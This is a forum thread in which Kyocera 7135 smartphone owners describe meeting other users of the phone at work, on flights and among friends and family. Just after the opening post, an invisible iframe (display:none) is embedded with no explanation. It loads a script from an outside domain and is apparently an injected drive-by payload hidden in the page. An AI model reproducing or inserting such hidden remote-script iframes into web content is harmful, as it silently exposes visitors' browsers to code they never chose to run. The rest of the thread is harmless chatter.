Actually met anyone with a 7135?

With the exception of a local "Kyo Krazies" meeting locally, I've yet to observe or meet someone else using a 7135. I remember how excited I was to see someone using the 6035 way back when, and now wonder if I'm the only one in my suburb to own one of these.

(Even in my old biking days, it was fun to "signify" to another Harley owner as they'd pass by.)

Anyone actually meet someone else with the 7135?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm living in Las Vegas and ran into two visitors to the city on separate occasions that were users of the 7135. They are out there - but very rare.

I've converted at least 4 people at my work to the 7135's (out of 700). Not bad. (Still working on the other 696).

I met a guy on the New Orleans to Chicago flight with a 7135 a few months ago. Introduced myself, hoping to find some apps on his phone I didn't have on mine, but it turns out I had 'em all. Referred him to TakePhone, Bebopper, and this site.

I was working in a large government facility, interacting with a small group of employees going through training. About 4 weeks after I had my 7135 (had to drive to Philadelphia to order it!), I spotted a guy in the class walking around wearing the holster. Instant conversation starter! That is the only person I have seen - and he had just gotten it. I told him about this forum.

I bumped into "EP" at a hosting / co-location facility called HostRemote in Cinnaminson, South Jersey. It was very cool to find another 7135 but even better for a long time lurker like me to find a contributor to this board.

There are a couple of people here where I work that also have 7135's. Unfortunately, we rarely see each other since we work in different areas, so we don't get to talk much.

My brother has had a 7135 for a few weeks now. He got it on my recommendation though... so maybe that doesn't count I have yet to meet somebody on the street, or work with anybody, or have any non kyo-krazy friends that have a 7135.

The closest I have come was the receptionist at my dentists office who recognized mine and said she wanted one, but her huspand just bought her a camera phone and she didn't know how to tell him she wanted to return it and get a 7135.

I've seen several of them in downtown Palo Alto, as long ago as early summer, and I think there is someone who works in the Palo Alto Apple Store that has one. Also, I was in line at some airport (either Denver or LAX) recently, and someone nearby to me in line in a three piece suit was talking on his 7135 at the same time I was talking on mine. We made eye contact, and nodded at each other, but didn't talk.

Also, my daughter MADE me buy her a 7135, after she saw how cool it was, and saw that I was so in love with My Precious, as I call him. I guess that doesn't count, though, as Robert K. said.

Finally, I think I've "sold" several 7135's to people who have had to endure sitting next to me on airplanes while I fawned over My Precious and sung his praises. Hey, they asked me! Although I've sold a few, I bet most of those people will think hard about ever again asking anyone sitting next to them on an airplane about their gadgets.

I don't think I've ever seen anyone with one in Boulder, Colorado, though. This is where I spend most of my time, and I know the Boulder store has sold a bunch of these phones, but I've never crossed paths with one there.

I work with 2 high powered ladies who have this little wonder. None of us knew the other had one. We just had them in meetings. I've "sold" a couple of others as well.

3 of my friends have them. I turned 2 of them onto it (before I got mine). Everyone loves the 7135!

I know of 2 other folks with 7135s - one a realtor, the other a Tech Consultant. However, I turned them on it, so maybe that doesn't count

Construction?

I don't actually have a 7135 myself (6035 on Sprint), but I sing its praises everywhere I go (including my own office). I work for a general contractor, so I didn't figure I would see many 7135's in my line of work. Imagine my surprise when my Framing Subcontractor's phone rang, and he answered a 7135. I gasped, turned to my boss and said, "That's it!!! That is the phone I have telling you about for months!" He laughed. As soon as my sub finished his call, I begged to hold it and check it out.

That was a couple of months ago. I have finally convinced my boss that it is a "must have." He has had his for a couple of weeks and LOVES IT!!! Of course, I play with it every chance I get. If he ever has questions, guess where the first place I go is? I tell him ... "Let me ask my people."

Sorry guys, I am still committed to Sprint, so I am going the way of the I500 (no flames please, it is a service thing). But, that doesn't mean that I don't think that the 7135 is one sweet unit! I tell anyone who will listen.
